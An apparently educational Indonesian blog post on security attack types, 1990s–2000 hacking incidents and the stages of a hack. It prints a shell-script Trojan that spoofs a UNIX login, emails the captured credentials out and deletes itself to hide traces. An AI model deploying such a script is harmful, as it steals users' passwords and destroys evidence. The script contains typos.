Security Attack Models

Menurut W. Stallings [William Stallings, “Network and Internetwork Security,” Prentice

Hall, 1995.] serangan (attack) terdiri dari :

  • Interruption: Perangkat sistem menjadi rusak atau tidak tersedia. Serangan ditujukan kepada ketersediaan (availability) dari sistem. Contoh serangan adalah “denial of service attack”.
  • Interception: Pihak yang tidak berwenang berhasil mengakses asset atau informasi. Contoh dari serangan ini adalah penyadapan (wiretapping).
  • Modification: Pihak yang tidak berwenang tidak saja berhasil mengakses, akan tetapi dapat juga mengubah (tamper) aset. Contoh dari serangan ini antara lain adalah mengubah isi dari web site dengan pesan-pesan yang merugikan pemilik web site.
  • Fabrication: Pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem. Contoh dari serangan jenis ini adalah memasukkan pesan-pesan palsu seperti e-mail palsu ke dalam jaringan komputer.
SECURITY BREACH ACCIDENT
1996 U.S. Federal Computer Incident Response Capability (FedCIRC) melaporkan bahwa lebih dari 2500 “insiden” di system komputer atau jaringan komputer yang disebabkan oleh gagalnya sistem keamanan atau adanya usaha untuk membobol sistem keamanan
1996 FBI National Computer Crimes Squad, Washington D.C.,  memperkirakan kejahatan komputer yang terdeteksi kurang dari 15%, dan hanya 10% dari angka itu yang dilaporkan
1997 Penelitian Deloitte Touch Tohmatsu menunjukkan bahwa dari 300 perusahaan di Australia, 37% (dua diantara lima) pernah  mengalami masalah keamanan sistem komputernya.
1996 Inggris, NCC Information Security Breaches Survey menunjukkan bahwa kejahatan komputer menaik 200% dari tahun 1995 ke 1996.  Kerugian rata-rata US $30.000 / insiden.
1998 FBI melaporkan bahwa kasus persidangan yang berhubungandengan kejahatan komputer meroket 950% dari tahun 1996 ke

tahun 1997, dengan penangkapan dari 4 ke 42, dan terbukti

(convicted) di pengadilan naik 88% dari 16 ke 30 kasus.

Dan lain-lain. Dapat dilihat di www.cert.org
Contoh akibat dari jebolnya sistem keamanan, antara lain: 
1988 Keamanan sistem mail sendmail dieksploitasi oleh RobertTapan Morris sehingga melumpuhkan sistem Internet. Kegiatan

ini dapat diklasifikasikan sebagai “denial of service attack”.

Diperkirakan biaya yang digunakan untuk memperbaiki dan hal-hal lain yang hilang adalah sekitar $100 juta. Di tahun 1990 Morris

dihukum (convicted) dan hanya didenda $10.000.

10 Maret 1997 Seorang hacker dari Massachusetts berhasil mematikan sistem telekomunikasi di sebuah airport local (Worcester,  Massachusetts) sehingga mematikan komunikasi di control tower dan menghalau pesawat yang hendak mendarat.Dia juga mengacaukan sistem telepon di Rutland, Massachusetts.

http://www.news.com/News/Item/Textonly/0,25,20278,00.html?pfv

1990 Kevin Poulsen mengambil alih system komputer telekomunikasi di Los Angeles untuk memenangkan kuis di sebuah radio local.
1995 Kevin Mitnick, mencuri 20.000 nomor kartu kredit, menyalin system operasi DEC secara illegal dan mengambil alih hubungan telpon di New York dan California.
1995 Vladimir Levin membobol bank-bank di kawasan Wallstreet, mengambil uang sebesar $10 juta.
2000 Fabian Clone menjebol situs aetna.co.id dan Jakarta mail dan membuat directory atas namanya berisi peringatan terhadap administrator situs tersebut.
2000 Beberapa web site Indonesia sudah dijebol dan daftarnya (besertacontoh halaman yang sudah dijebol) dapat dilihat di koleksi

<http://www.2600.com&gt;

2000 Wenas, membuat server sebuah ISP di singapura down
MEMAHAMI HACKER BEKERJA

Secara umum melalui tahapan-tahapan sebagai berikut :

  1. Tahap mencari tahu system komputer sasaran.
  2. Tahap penyusupan
  3. Tahap penjelajahan
  4. Tahap keluar dan menghilangkan jejak.

Contoh kasus Trojan House, memanfaatkan SHELL script UNIX :

Seorang gadis cantik dan genit peserta kuliah UNIX di sebuah perguruan tinggi memiliki potensi memancing pengelola sistem komputer (administrator pemegang account root . . . hmmm) yang lengah. Ia melaporkan bahwa komputer tempat ia melakukan tugas-tugas UNIX yang diberikan tidak dapat dipergunakan. Sang pengelola sistem komputer tentu saja dengan gagah perkasa ingin menunjukkan kekuasaan sebagai administrator UNIX.

“Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya perbaiki dari tempat kamu”, ujar administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit peserta kuliah tersebut.

Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk juga hompepage perguruan tinggi tersebut di-obok-obok, maklum pengelolanya masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa homepage mereka dijebol oleh hacker dari Luar Negeri . . . . hihiii

Nah sebenarnya apa sih yang terjadi ?

Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut:

#!/bin/sh

###################################

# Nama program : my_login

# Deskripsi :Program kuda trojan sederhana

# versi 1.0 Nopember 1999

####################################

COUNTER=0

Cat /etc/issue

While [ “$COUNTER” –ne 2 ]

do

let COUNTER=$COIUNTER+1

echo “login: \c”

read LOGIN

stty echo

echo “password: \c”

read PASSWORD

echo “User $LOGIN : $PASSWORD” | mail gadis@company.com

stty echo

echo

echo “Login Incorrect”

done

rm $0

kill –9 $PPID

Apabila program ini dijalankan maka akan ditampilkan layar login seperti layaknya awal penggunaan komputer pdaa sistem UNIX:

Login:

Password:

Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak melihat gadis tersebut menjalankan program ini tentunya tidak sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda dibanding layar login sesungguhnya.

Seperti pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul pesan

Login:root

Password: ********

Login Incorrect

Tentu saja Administrator UNIX akan kaget bahwa passwordnya ternyata (seolah-olah) salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya dibatalkan dan kembali keluar UNIX.

Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi password pada layar di atas, setelah itu maka otomatis data login dan password tersebut akan di email ke mailto:hacker@company.com. Sampai disini maka si gadis lugu dan genit telah mendapatkan login dan password . . . ia ternyata seorang hacker !!

Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di atas, yaitu

 rm $0

kill –9 $PPID

yang artinya akan segera dilakukan proses penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peserta kuliahnya.

Sukses dari program ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat dieksekusi oleh root. Hacker yang baik memang harus berusaha memancing agar pemilik root menjalankan program ini.

One response to “Security Attack Models

  1. Pingback: SISTEM KEAMANAN KOMPUTER RESUME 2 | WELCOME TO GEMMAILHAMPURNAMA WORDPRES·

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s